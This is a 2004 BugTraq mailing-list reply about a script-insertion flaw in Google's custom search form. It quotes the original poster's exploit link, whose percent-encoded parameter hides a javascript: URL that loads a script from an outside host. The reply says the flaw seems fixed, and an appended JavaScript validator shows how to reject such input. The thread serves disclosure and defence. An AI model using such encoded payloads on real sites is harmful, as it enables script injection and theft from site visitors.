BugTraq
Re: Google Script Insertion Exploit
Oct 23 2004 03:52PM
Jérôme ATHIAS (jerome athias caramail com)
In-Reply-To: <20041019163859.32238.qmail (at) www.securityfocus (dot) com [email concealed]>
>The exploit is easiest to produce through a custom google search form which
>are commonly seen, used and understood on the web, but you can also do it
>through a simple link, this one works in IE:
>
>http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27
>
Good work.
Seems to be fixed:
http://news.netcraft.com/archives/2004/10/22/google_fix_second_phishing_vulnerability.html
Regards,
Jerome ATHIAS
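
A server-side check for the kind of input in the quoted link, as an added example that is not part of the original post or of Google's code: it percent-decodes the `cof` parameter and rejects a URL-valued field whose scheme is not http or https. The `;`-separated `KEY:value` layout, the treatment of `L` as a URL field, the host `search.example` and all function names are assumptions made for illustration.

```javascript
// Added example (not from the original post). Assumed format: cof is a
// ';'-separated list of KEY:value pairs and the L field carries a URL.
const URL_FIELDS = new Set(["L"]);
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Decode until the value stops changing, so double-encoded input such as
// %256a... is normalised too. Returns null (fail closed) if it never settles
// or is malformed.
function decodeFully(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch { return null; }
    if (next === current) return current;
    current = next;
  }
  return null;
}

// Parse with the WHATWG URL parser, which strips tabs, newlines and leading
// control characters the way a browser does, then allowlist the scheme.
function isSafeUrl(value) {
  let parsed;
  try { parsed = new URL(value); } catch { return false; } // not an absolute URL
  return ALLOWED_SCHEMES.has(parsed.protocol);
}

// Returns a list of findings; an empty list means the cof value passed.
function checkCof(link) {
  const cof = new URL(link).searchParams.get("cof"); // decoded once here
  if (cof === null) return [];
  const decoded = decodeFully(cof);
  if (decoded === null) return [{ field: "cof", value: null }];
  const findings = [];
  for (const pair of decoded.split(";")) {
    const idx = pair.indexOf(":");
    if (idx < 0) continue;
    const key = pair.slice(0, idx).trim();
    const val = pair.slice(idx + 1);
    if (URL_FIELDS.has(key) && !isSafeUrl(val)) findings.push({ field: key, value: val });
  }
  return findings;
}

// Constructed sample inputs: an encoded javascript: scheme and a normal logo URL.
const SAMPLE_BAD = "https://search.example/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3avoid(0)";
const SAMPLE_OK = "https://search.example/custom?cof=L:https://example.com/logo.png;LH:50";
```

The same allowlist belongs at the point where the value is written into an attribute, since filtering only the raw query string misses encodings the browser resolves later.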